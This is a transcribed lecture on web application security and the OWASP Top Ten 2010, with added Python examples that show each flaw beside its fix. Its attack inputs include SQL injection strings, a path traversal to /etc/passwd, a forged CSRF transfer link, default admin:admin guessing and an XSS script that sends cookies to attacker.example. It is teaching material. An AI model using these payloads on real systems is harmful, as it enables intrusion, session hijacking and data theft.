2010-09-23

Web application security and OWASP Top Ten 2010

Dr. Ulf Larson, Omegapoint


What is application security?

• Definition:
  – that appropriate measures are taken during the lifecycle of an application,
  – to prevent violations of the application's security policy,
  – due to errors in design, development, operation, upgrade and/or maintenance.

• Or, more informally: even the slightest coding error may lead to utter chaos, disaster and the destruction of mankind (well…).

Pop Quiz

• Give me at least two examples of where you really need to assure
  – that appropriate measures are taken during the lifecycle of an application,
  – to prevent violations of the application's security policy,
  – due to errors in design, development, operation, upgrade and/or maintenance,
• to prevent utter chaos…


So, why would I (personally) need application security?

[Slide illustration: a webshop with dancing cows (or pigs) and many really cool buttons]

I run a small business and put my money into business value instead => money in => good for me!

Yeah! Good for you, until:

• One week before <random holiday where people spend LOTS of money>, your webshop dives, just to come up two weeks later…
• The accountant from the credit card company realises that "Yes, we are compliant" actually meant "No, we aren't compliant, but you don't know that"
• A considerable portion of this year's vacation is spent calming our customers, since they noticed that their "private" pictures were all over the Internet…

And, oh yeah. It happens.


Doesn't sound too cool… What's wrong?

• The number of websites has increased (didn't see that one coming, right…)
• More powerful, interconnected websites that allow user interaction

Is there more?

• "Exotic" selection of passwords, such as:
  123456
  12345
  123456789
  password
  iloveyou
• Encryption, or lack thereof…


Ok, I'm prepared, what's next?

• Tools, documentation and working exploits, of course! Freely available to anyone (or to the highest bidder)

…and finally

• Application code contains (lots of) known vulnerabilities. The classic: the username from the request is pasted straight into the query text,

  "SELECT id FROM user WHERE username = '" + name + "'";

  so a login with

  name = ' or 1=1 --

  turns the query into SELECT id FROM user WHERE username = '' or 1=1 --' and logs in without knowing a username or a password.


Which leads to the following

                                              ASP    ASPX   ColdFusion  Struts  JSP    PHP    Perl
Percentage of sites that have had at
least one serious vulnerability (ever)        74 %   73 %   86 %        77 %    80 %   80 %   88 %
Percentage of sites that have at least
one serious vulnerability (currently)         57 %   58 %   54 %        56 %    59 %   63 %   75 %

Source: Website security statistics report, Tom Brennan, 2010

Web communication basics

A really, really, really brief background


Web communication basics

• HTTP is an application-level network protocol.
• A web browser at the client side communicates with one or more servers.
• The browser makes a request, and the server answers with a response.
• HTTP itself is stateless. To keep state between requests, the server generates a session token; this ID is passed between the browser and the server with each request/response.
• A cookie is a piece of data that is passed along with requests/responses (and is the usual carrier for the session token).

Common communication pattern – development and code

1. Someone develops code and puts it on the server (HTML, JavaScript, JSP, Java).
2. The client asks the server for a resource (the request)… and part of the code services the request.
3. The server responds… and part of the code goes to the browser to represent the response.


Common communication pattern – login

Client → Server:   http://host.com?username=ulf&password=ulf
Server → Database: Select * from users where username = ulf and password = ulf
Database → Server: [true, userObject]
Server → Client:   sessionID = xp33xx, together with the page
                   <body> Hello <% userObject.name %> </body>

Pop quiz: Where do security bugs cause problems?

Here. Here. Here. And here: at every hop in the diagram above, from the parameters in the request, via the query and the session ID, to the data rendered into the response.


OWASP Top Ten 2010

First: What is OWASP?

• Open Web Application Security Project
• Non-profit organization with the goal of making application security visible, so that informed security decisions can be made
  – Wiki (www.owasp.org)
  – Blog (owasp.blogspot.com)


What is OWASP doing?

• Manages and runs several projects within the application security area
• Projects determine their own focus:
  – Guidelines for security testing and code review
  – Software for proxying and fuzzing
  – A framework for implementing security-oriented design principles (ESAPI)
  – The Top Ten list

OWASP Top Ten 2010

• The OWASP Top Ten lists the ten most dangerous categories of application vulnerabilities, ranked by risk.
• Risk is based on generic parameters, such as the empirically observed prevalence of each vulnerability type, how easy it is to exploit and to detect, and its technical impact.
• Risk is NOT based on who a specific attacker is, or on what consequences an attack has on business value; those are specific to each organization.


Top Ten 2010

A1 – Injection
A2 – Cross Site Scripting (XSS)
A3 – Broken Authentication and Session Management
A4 – Insecure Direct Object Reference
A5 – Cross Site Request Forgery (CSRF)
A6 – Security Misconfiguration
A7 – Insecure Cryptographic Storage
A8 – Failure to Restrict URL Access
A9 – Insufficient Transport Layer Protection
A10 – Unvalidated Redirects and Forwards

A1 – Injection

Input data from an untrusted source (an external system, a user at a web browser) is interpreted as code or as part of a query (SQL, XPath) rather than as input data.

Example (normal use): Login → HTTP → SQL

Select * from users where uname='ulf';


A1 – Injection

Example (misuse -> attack): Login → HTTP → SQL

Select * from users where uname='' or 1=1 --';

The quote closes the string, "or 1=1" makes the condition true for every row, and "--" comments out the rest of the query.

A1 – Injection: Risk

• Exploitability: it is easy to create the text input (' or 1=1)
• Prevalence: many types: SQL, XPath, LDAP…
• Detectability: use tools, exploit bad fault (error) handling that echoes database errors to the user
• Impact: loss of data, arbitrary code execution, denial of service
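Added example (my code, not from the slides or from OWASP), serving both the concatenated login query on the "what's next?" slide and the A1 attack above: the vulnerable query is executed against a constructed in-memory SQLite table, next to the parameterized query that fixes it. Table and column names follow the slides; the sample rows, the SQLite back end and the error_leak probe are my assumptions.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory stand-in for the application's
    user table (names follow the slides, the rows are made up)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, uname TEXT, pw TEXT)")
    db.executemany("INSERT INTO users (uname, pw) VALUES (?, ?)",
                   [("ulf", "ulf"), ("alice", "s3cret")])
    return db


def build_injected_query(name):
    """Exactly the concatenation on the slide: shows what reaches the database."""
    return "SELECT id FROM user WHERE username = '" + name + "'"


def login_vulnerable(db, uname, pw):
    """The slide's pattern: user input is pasted into the SQL text, so a quote
    in the input changes the structure of the query."""
    sql = ("SELECT id FROM users WHERE uname = '" + uname +
           "' AND pw = '" + pw + "'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, uname, pw):
    """The fix: bound parameters. The driver sends the input as values, so the
    query structure is fixed before any user data is seen. Escaping quotes by
    hand is not a substitute."""
    row = db.execute("SELECT id FROM users WHERE uname = ? AND pw = ?",
                     (uname, pw)).fetchone()
    return row is not None


def error_leak(db, uname):
    """Detectability: with bad error handling a single quote produces a database
    error that tells the attacker the input reaches a query.
    Returns the error text, or None when the input was handled quietly."""
    try:
        login_vulnerable(db, uname, "x")
    except sqlite3.Error as e:
        return str(e)
    return None


if __name__ == "__main__":
    db = make_db()
    print(build_injected_query("' or 1=1 --"))
    print("vulnerable, ' or 1=1 --   :", login_vulnerable(db, "' or 1=1 --", "anything"))
    print("parameterized, same input :", login_parameterized(db, "' or 1=1 --", "anything"))
    print("error for a lone quote    :", error_leak(db, "'"))
```

The vulnerable login returns True for the ' or 1=1 -- input while the parameterized one returns False; a lone quote raises a database error, which is the signal a tester (or a scanner) uses to find the injection point, and which the application should log rather than show.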


A2 – Cross Site Scripting

Data is sent from the server to the web browser without validation or output encoding. The sent data is interpreted by the browser as script code (and not as data).

Example (normal use): a visitor posts the comment

  Hi! cool blog post or what!

Send comment → Read comment: the next reader sees the text.

Example (misuse): the "comment" contains a script tag instead of text.

Send comment → Read comment: the next reader's browser executes the script, in the context of the blog site.


A2 – Cross Site Scripting: Risk

• Exploitability: could be tricky to create text data with the correct syntax (<script>…) for the place in the page where it ends up
• Prevalence: data is passed between browser and server all the time
• Detectability: submit data, watch the result, look at the source code of the browser page
• Impact: session hijacking, redirecting traffic to another site
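Added example (mine, not the blog from the slides): the comment rendering with and without output encoding, fed through Python's HTML parser as a stand-in for the browser to show what survives into the page. The benign comment text is the slide's; the cookie-stealing script, the attribute example and the attacker.example host are constructed.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs (not from the slides). The hostname is a placeholder
# for an attacker-controlled host; document.cookie is what a session-hijacking
# payload typically sends there.
BENIGN_COMMENT = "Hi! cool blog post or what!"
EVIL_COMMENT = ('<script>new Image().src="http://attacker.example/?c="'
                '+document.cookie</script>')
EVIL_TITLE = 'x" onmouseover="alert(document.cookie)'


def render_unsafe(comment):
    """The blog on the slide: the comment is copied straight into the HTML."""
    return '<div class="comment">' + comment + '</div>'


def render_safe(comment):
    """Output encoding for the HTML body context: & < > " ' become entities,
    so the browser displays the text instead of executing it."""
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'


def render_attribute_unsafe(title):
    return '<a href="/post/1" title="' + title + '">post</a>'


def render_attribute_safe(title):
    """Attribute context: the value must be quoted AND escaped, otherwise a
    quote in the input closes the attribute and adds an event handler."""
    return '<a href="/post/1" title="' + html.escape(title, quote=True) + '">post</a>'


class _PageModel(HTMLParser):
    """Stand-in for the browser's parser: records script tags and attributes."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.attributes = {}

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        self.attributes.update(attrs)


def what_the_browser_sees(page):
    """Return (number of script tags, attributes) the browser would act on."""
    model = _PageModel()
    model.feed(page)
    model.close()
    return model.script_tags, model.attributes


if __name__ == "__main__":
    for name, page in [("unsafe", render_unsafe(EVIL_COMMENT)),
                       ("safe", render_safe(EVIL_COMMENT))]:
        print(name, "->", what_the_browser_sees(page)[0], "script tag(s)")
```

The point of the attribute example is the "correct syntax" bullet above: the body-context payload needs a script tag, the attribute-context payload only needs a quote, so the encoding has to match the context into which the data is written.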

A3 – Broken Authentication and Session Management

Mechanisms for authentication and session management between server and client are incorrectly implemented. The attacker may find passwords and session IDs, and may be able to steal users' identities.

Example: Public computer, user Alice logs on to her bank.

Login → the server issues an Auth-ID (the session token) → the browser sends the Auth-ID with every request

Alice closes(!) the browser window and walks away. The session timeout on the server is 5 days.


A3 – Broken Authentication and Session Management

Example: Eve navigates to the bank on the same computer somewhat later…

…and can suddenly perform transactions as Alice, without having to log in first(!). The browser still holds Alice's Auth-ID, and with a timeout of 5 days the server still accepts it.
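Added example (mine, not the bank's code): a minimal server-side session store with an idle timeout, run through the Alice/Eve scenario above with an injectable clock so that "somewhat later" can be fast-forwarded. The 5-day timeout is the slide's; the 15-minute timeout, the session ID format and the scenario helper are my assumptions.

```python
import secrets
import time

FIVE_DAYS = 5 * 24 * 3600      # the bank on the slide
FIFTEEN_MINUTES = 15 * 60      # a sane idle timeout for a banking session (assumption)


class FakeClock:
    """Lets the example fast-forward time instead of sleeping."""

    def __init__(self, start=1_000_000.0):
        self.now = start

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


class SessionStore:
    def __init__(self, idle_timeout, clock=time.time):
        self.idle_timeout = idle_timeout
        self.clock = clock
        self._sessions = {}

    def create(self, user):
        # 128 bits from the OS CSPRNG: not a counter, not a hash of the user name
        sid = secrets.token_urlsafe(16)
        self._sessions[sid] = {"user": user, "last_seen": self.clock()}
        return sid

    def lookup(self, sid):
        """Return the user for a valid session, None if unknown or expired."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self.clock()
        if now - s["last_seen"] > self.idle_timeout:
            del self._sessions[sid]        # expire on the server, not only in the cookie
            return None
        s["last_seen"] = now
        return s["user"]

    def logout(self, sid):
        """Explicit logout must invalidate the server-side entry."""
        self._sessions.pop(sid, None)


def public_computer(idle_timeout, minutes_later=120, alice_logs_out=False):
    """Alice logs in, closes the window (or logs out) and leaves; Eve opens the
    bank in the same browser some minutes later. Returns whom the bank sees."""
    clock = FakeClock()
    bank = SessionStore(idle_timeout, clock)
    sid = bank.create("alice")
    if alice_logs_out:
        bank.logout(sid)
    clock.advance(minutes_later * 60)
    return bank.lookup(sid)


if __name__ == "__main__":
    print("5-day timeout, Eve two hours later :", public_computer(FIVE_DAYS))
    print("15-min timeout, Eve two hours later:", public_computer(FIFTEEN_MINUTES))
```

Three things make the difference: the timeout is enforced on the server (a cookie expiry alone can be edited away), a visible logout actually destroys the session, and the ID is unguessable so Eve cannot simply try neighbouring values.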

A4 – Insecure Direct Object Reference

An object reference (for example a file name) is made visible to users. If access control is not performed when the object is referred to, the user can try to refer to other objects instead.

Example (normal use)

www.company.com/getFile?file=info.txt  →  the server returns info.txt


A4 – Insecure Direct Object Reference

Example (misuse)

www.company.com/getFile?file=../../../etc/passwd  →  the server returns /etc/passwd

There is no access control for /etc/passwd: the file name is used as given, and "../" walks out of the intended directory.
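Added example (mine, not the company's getFile code): the traversal above reproduced on a constructed temporary file tree, next to two fixes, first the canonicalise-and-check version of getFile, then the A4-proper fix of handing out indirect references and checking authorisation on every access. The file names, the document references and the owner sets are made up; a private file one level up stands in for /etc/passwd so the example never touches the real one.

```python
import os
import tempfile


def make_sandbox():
    """Constructed sample file tree (not from the slides): a document root with
    the public info.txt and plan.txt, and a private file one level up that
    stands in for /etc/passwd. Returns the document root."""
    root = tempfile.mkdtemp()
    docs = os.path.join(root, "docs")
    os.mkdir(docs)
    with open(os.path.join(docs, "info.txt"), "w") as f:
        f.write("public information\n")
    with open(os.path.join(docs, "plan.txt"), "w") as f:
        f.write("alice's plan\n")
    with open(os.path.join(root, "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/sh\n")
    return docs


def get_file_vulnerable(docs, name):
    """getFile?file=... as on the slide: the name is joined and opened as given,
    so '../' walks out of the document root."""
    with open(os.path.join(docs, name)) as f:
        return f.read()


def get_file_safe(docs, name):
    """Canonicalise first, then require the result to stay under the root.
    realpath also resolves symlinks, so a link inside docs that points
    outside is caught as well."""
    root = os.path.realpath(docs)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError("path escapes document root: %r" % name)
    with open(target) as f:
        return f.read()


# Better still for A4: do not expose the file name at all. Hand out an
# indirect reference and check the caller's authorisation on every access.
# The references and the reader sets below are made up for the example.
DOCUMENTS = {
    "doc-1": ("info.txt", {"alice", "bob"}),
    "doc-2": ("plan.txt", {"alice"}),
}


def get_document(docs, ref, user):
    entry = DOCUMENTS.get(ref)
    if entry is None or user not in entry[1]:
        raise PermissionError("%s may not read %s" % (user, ref))
    filename, _readers = entry
    return get_file_safe(docs, filename)


if __name__ == "__main__":
    docs = make_sandbox()
    print("vulnerable:", get_file_vulnerable(docs, "../passwd").strip())
    try:
        get_file_safe(docs, "../passwd")
    except PermissionError as e:
        print("safe:", e)
```

Note that the path check alone only stops traversal; it still lets any logged-in user fetch any file inside the document root by name, which is the actual A4 weakness. The reference map closes that, and makes the URL reveal nothing about the file system.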

A5 – Cross Site Request Forgery

An attacker creates a normal server request and then tricks a logged-in user into carrying out this request. The request is carried out with the user's privileges.

Example (normal use)

www.bank.com/transfer?amount=10&account=123  →  account 123: + 10


A5 – Cross Site Request Forgery

Example (misuse)

1. The attacker sends the logged-in user a link: "Look! Super cool link!" pointing at
   www.bank.com/transfer?amount=100&account=223
2. The user clicks. The browser attaches the user's bank session to the request, and the bank executes it: account 223: + 100
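Added example (mine, not the bank's code): the transfer handler from the slides in its forgeable form next to one that rejects cross-site requests with a per-session CSRF token and refuses to change state on GET. The amounts and account numbers follow the slide; the session IDs, the HMAC-derived token and the request dictionaries standing in for HTTP requests are my assumptions.

```python
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)   # per-deployment key (assumption)


def csrf_token(session_id):
    """Token derived from the session: only the server can compute it, only a
    page served inside Alice's session can embed it, and a page on another
    site cannot read it (same-origin policy). A random per-session token kept
    on the server works just as well."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(request, sessions, balances):
    """The bank on the slide: any request carrying a valid cookie is executed,
    no matter which site caused the browser to send it."""
    if sessions.get(request["cookie"]) is None:
        return "login required"
    balances[request["account"]] += int(request["amount"])
    return "ok"


def transfer_safe(request, sessions, balances):
    sid = request["cookie"]
    if sessions.get(sid) is None:
        return "login required"
    if request["method"] != "POST":                      # no state change on GET
        return "method not allowed"
    if not hmac.compare_digest(request.get("csrf", ""), csrf_token(sid)):
        return "csrf check failed"
    balances[request["account"]] += int(request["amount"])
    return "ok"


def forged_request_outcome(handler, method="GET"):
    """Alice is logged in. Eve's page makes Alice's browser request the transfer
    URL from the slide (a link, or a hidden auto-submitting form for POST).
    The browser adds Alice's cookie, but Eve's page cannot add the token.
    Returns the attacker's balance afterwards."""
    sessions = {"sid-alice": "alice"}
    balances = {"123": 0, "223": 0}
    forged = {"method": method, "cookie": "sid-alice",
              "amount": "100", "account": "223"}
    handler(forged, sessions, balances)
    return balances["223"]


def legitimate_transfer_outcome():
    """Alice's own form post carries the token the bank rendered into the form."""
    sessions = {"sid-alice": "alice"}
    balances = {"123": 0, "223": 0}
    genuine = {"method": "POST", "cookie": "sid-alice",
               "csrf": csrf_token("sid-alice"), "amount": "10", "account": "123"}
    result = transfer_safe(genuine, sessions, balances)
    return result, balances["123"]


if __name__ == "__main__":
    print("vulnerable bank, forged GET :", forged_request_outcome(transfer_vulnerable))
    print("fixed bank, forged GET      :", forged_request_outcome(transfer_safe))
    print("fixed bank, forged POST     :", forged_request_outcome(transfer_safe, "POST"))
    print("fixed bank, Alice's own POST:", legitimate_transfer_outcome())
```

Requiring POST on its own is not a defence (the attacker's page can host a form); the token is what the cross-site page cannot supply. SameSite cookie attributes reduce the exposure further but do not replace the token.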

A6 – Security Misconfiguration

One or more components (application, framework, web server, application server) in a system are not securely configured. An attacker uses any of these configuration mistakes.

Example: IIS remote administration application running on port 8098 (the default)

https://www.server.com:8098

Why not guess <admin:admin>, or brute force the password?


A6 – Security Misconfiguration

Example: well… <admin, admin> works.

Then what? – Change the admin password, create a user…

I have seen cases where there is no user name, just a password…

A7 – Insecure Cryptographic Storage

An application stores sensitive information (credit card details, PII, patient records) in the clear, or with insufficient encryption or hashing. An attacker can then use stolen information directly.

Example: Username and password are stored in the clear on disk…

1. Insert into creds ("uname","pw") values ("ulf","ulf");
2. The row <ulf,ulf> sits in the database exactly as typed


A7 – Insecure Cryptographic Storage

…and then get stolen during an attack. The attacker can use the stolen information right away (no cracking or guessing needed).

1. listUser.aspx?id=1 ; select * from creds;   (an injection, A1, used to dump the table)
2. The database returns <ulf,ulf>
3. The attacker now has a working username and password
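Added example (mine, not the application's code): what the creds table should have held instead, a salted, slow password hash with constant-time verification, plus a dump_table helper showing what the injection above would now return. The user name and password follow the slide; PBKDF2-HMAC-SHA256, the iteration count, the storage string format and the dictionary standing in for the table are my assumptions.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 600_000     # PBKDF2-HMAC-SHA256 work factor; tune so one hash costs ~100 ms


def hash_password(password):
    """Salted, slow hash. The random salt makes identical passwords hash
    differently (no precomputed tables); the iteration count makes every
    guess the attacker tries expensive."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS, base64.b64encode(salt).decode(), base64.b64encode(dk).decode())


def verify_password(password, stored):
    _algo, iterations, salt_b64, dk_b64 = stored.split("$")
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    got = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(got, expected)     # constant-time comparison


# Constructed credential store standing in for the "creds" table on the slide.
# _DUMMY keeps the login cost the same for unknown users, so response time
# does not reveal which user names exist.
_DUMMY = hash_password("dummy")


def register(creds, uname, password):
    creds[uname] = hash_password(password)


def login(creds, uname, password):
    stored = creds.get(uname, _DUMMY)
    ok = verify_password(password, stored)
    return ok and uname in creds


def dump_table(creds):
    """What 'select * from creds' now hands the attacker: no usable passwords."""
    return sorted(creds.items())


if __name__ == "__main__":
    creds = {}
    register(creds, "ulf", "ulf")
    print(dump_table(creds))
    print(login(creds, "ulf", "ulf"), login(creds, "ulf", "wrong"))
```

A leaked table now costs the attacker a guessing campaign per row instead of nothing; pair this with the A1 fix so the table is not dumped in the first place. Hashing is for passwords only; data the application must read back (card numbers, records) needs encryption with a key that is not stored next to the data.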

A8 – Failure to Restrict URL Access

An access control check is performed before a link is rendered in the web browser. If a user, instead of clicking on the link, navigates directly to the address the link points to, the check is bypassed.

Example: the access control sits on the same page as the links, and runs before the links are generated.

Logged in as admin: the page renders <a href="CreateUser.html">Create …
Logged in as normal user: the link is not rendered, but the page it points to still exists


A8 – Failure to Restrict URL Access

Example: What happens if you, instead of following the link, type the address of the page where the link points? The page is served: nothing on CreateUser.html itself checks who is asking.
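Added example (mine, not the application on the slides): the menu that hides the link next to a handler that enforces the role itself, with a small dispatcher standing in for what happens when the URL is typed directly. The CreateUser.html path follows the slide; the users, roles, the "Create user" link text and the decorator are my assumptions.

```python
import functools

# Constructed users and roles (not from the slides).
ROLES = {"admin": {"admin"}, "ulf": {"user"}}


class Forbidden(Exception):
    pass


def require_role(role):
    """Enforce the check inside the handler, i.e. on every request, whether the
    user arrived by clicking a link or by typing the URL into the address bar."""
    def decorator(handler):
        @functools.wraps(handler)
        def wrapper(user, *args, **kwargs):
            if role not in ROLES.get(user, set()):
                raise Forbidden("%s is not %s" % (user, role))
            return handler(user, *args, **kwargs)
        return wrapper
    return decorator


def menu(user):
    """The slide's (insufficient) control: it only decides whether the link
    is drawn. Hiding a link is a usability feature, not an access control."""
    links = ['<a href="viewProfile.aspx">Profile</a>']
    if "admin" in ROLES.get(user, set()):
        links.append('<a href="CreateUser.html">Create user</a>')
    return links


def create_user_vulnerable(user, new_name):
    """Trusts that only admins ever saw the link; anyone who knows the URL gets in."""
    return "created %s" % new_name


@require_role("admin")
def create_user_safe(user, new_name):
    return "created %s" % new_name


ROUTES = {"CreateUser.html": create_user_safe}


def dispatch(user, path, *args):
    """Typing the address goes straight to the handler and never through menu()."""
    return ROUTES[path](user, *args)


if __name__ == "__main__":
    print("menu for ulf:", menu("ulf"))
    print("ulf types the URL, vulnerable:", create_user_vulnerable("ulf", "eve"))
    try:
        dispatch("ulf", "CreateUser.html", "eve")
    except Forbidden as e:
        print("ulf types the URL, fixed:", e)
```

The same rule applies to "hidden" URLs without any link at all (backup files, admin paths, old versions): deny by default at the routing layer and grant per handler, rather than relying on the URL staying unknown.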

A9 – Insufficient Transport Layer Protection

Sensitive information (e.g., username and password) travels between client and server. If the path is unprotected, uses weak encryption or is misconfigured, the attacker can use this to his advantage.

Example (normal use)

The browser talks to -----.omegapoint.se over HTTPS (SSL3/TLS); on the wire an eavesdropper sees only ciphertext, [t56x99e!xpW].


A9 – Insufficient Transport Layer Protection

Example (misconfiguration -> inconsistent use of HTTP/HTTPS)

1. HTTPS://www.secure.com/myLogin.aspx    on the wire: [xa345tyjF!aa]   (the login, which hands out Auth-ID = 33, is encrypted)
2. HTTP://www.secure.com/viewProfile.aspx   on the wire: Auth-ID = 33    (the very same session ID is now sent in the clear, and an eavesdropper can reuse it)
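Added example (mine, not www.secure.com's code): the Set-Cookie header the login page should send, with a simplified model of the browser rule that keeps a Secure cookie off plain http:// requests, so step 2 above can no longer leak Auth-ID even if a page is mistakenly linked over HTTP. The cookie name and value follow the slide; the HttpOnly flag, the HSTS header and the browser model are my assumptions.

```python
from http.cookies import SimpleCookie
from urllib.parse import urlsplit


def login_set_cookie(session_id, secure=True):
    """Set-Cookie header value the login page should send. Secure is the A9
    fix; HttpOnly additionally keeps the ID away from script (A2)."""
    c = SimpleCookie()
    c["Auth-ID"] = session_id
    c["Auth-ID"]["path"] = "/"
    c["Auth-ID"]["httponly"] = True
    if secure:
        c["Auth-ID"]["secure"] = True
    return c.output(header="").strip()


def browser_attaches_cookie(set_cookie_value, url):
    """Simplified model of the browser's rule (not a full cookie jar): a cookie
    flagged Secure is never sent on a plain http:// request, so the
    misconfigured viewProfile.aspx page would see no session at all and
    should bounce the user to https."""
    jar = SimpleCookie()
    jar.load(set_cookie_value)
    scheme = urlsplit(url).scheme.lower()
    for morsel in jar.values():
        if morsel["secure"] and scheme != "https":
            return False
    return True


# Tell the browser to upgrade every future request itself (HSTS). Sent once
# over HTTPS, it stops the browser from ever issuing step 2 over plain HTTP,
# including when the user types the address without a scheme.
HSTS_HEADER = ("Strict-Transport-Security", "max-age=31536000; includeSubDomains")


if __name__ == "__main__":
    header = login_set_cookie("33")
    print("Set-Cookie:", header)
    for url in ("https://www.secure.com/myLogin.aspx",
                "http://www.secure.com/viewProfile.aspx"):
        print(url, "->", "cookie sent" if browser_attaches_cookie(header, url) else "cookie withheld")
```

The cookie flag only stops the session ID from leaking; the credentials on the login form and everything on viewProfile.aspx still need the whole site served over HTTPS, which is what the HSTS header enforces on the client side.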

A10 – Unvalidated Redirects and Forwards

An application performs a redirect or forward of a request based on input data that the attacker can choose. The attacker can redirect the request to a target of his choice (for example a phishing site).

Example (normal use)

1. The user clicks a link to www.iwa.com/redirect?url=www.omegapoint.se
2. www.iwa.com answers: Ok, you're going to www.omegapoint.se
3. The browser follows the redirect…
4. …and lands on www.omegapoint.se


A10 – Unvalidated Redirects and Forwards

Example (misuse)

1. "Check it out! Super cool link!" The link the victim receives points at the trusted site: www.iwa.com/redirect?url=www.evil.com
2. The victim clicks; the request goes to www.iwa.com
3. www.iwa.com redirects to whatever the url parameter says
4. The browser lands on www.evil.com, although the user only ever clicked a www.iwa.com link
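Added example (mine, not www.iwa.com's redirect code): a validator for the url parameter that allows same-site paths and an allow-list of destination hosts, and collapses everything else, including the common bypasses, to a safe default. www.iwa.com and www.evil.com are the slide's; treating www.omegapoint.se as an approved destination, requiring full URLs for off-site targets, and the "/" default are my assumptions.

```python
from urllib.parse import urlsplit

# Hosts the redirector may send users to. www.iwa.com is the site on the
# slide; www.omegapoint.se is assumed to be an approved partner destination.
ALLOWED_HOSTS = {"www.iwa.com", "www.omegapoint.se"}


def safe_redirect_target(url, allowed_hosts=ALLOWED_HOSTS, default="/"):
    """Validate a user-supplied redirect destination.

    Accepts a same-site absolute path ('/account') or an absolute http(s)
    URL whose host is on the allow-list. Everything else collapses to
    `default`, including the usual bypasses: scheme-relative //evil,
    backslashes (browsers treat them as slashes), userinfo tricks
    (www.iwa.com@evil), lookalike hosts (www.iwa.com.evil), a missing
    second slash (https:/evil) and non-http schemes (javascript:)."""
    if not url or not url.strip():
        return default
    url = url.strip().replace("\\", "/")
    parts = urlsplit(url)
    if parts.scheme or parts.netloc:
        # anything that names a host must be a full http(s) URL ...
        if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
            return default
        # ... whose real host (after any user@ part) is on the allow-list
        host = (parts.hostname or "").lower()
        return url if host in allowed_hosts else default
    # no host at all: must be an absolute path on this site
    if not parts.path.startswith("/"):
        return default
    return url


if __name__ == "__main__":
    for candidate in ("https://www.omegapoint.se/", "/account",
                      "https://www.evil.com", "//www.evil.com",
                      "https://www.iwa.com@www.evil.com/", "javascript:alert(1)"):
        print("%-40s -> %s" % (candidate, safe_redirect_target(candidate)))
```

Where the set of destinations is small, an even simpler design avoids the parsing entirely: the redirect parameter carries an index into a server-side table of URLs, so the user never supplies a URL at all.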

Summary

• Web applications are becoming more common and more powerful, thus attracting attackers at an increasing rate!
• OWASP tries to emphasize the importance of application security
• The Top Ten list covers the ten vulnerability categories carrying the highest risk
• Injection and Cross Site Scripting are the most risky: common, easy to find and use, high impact

http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202010.pdf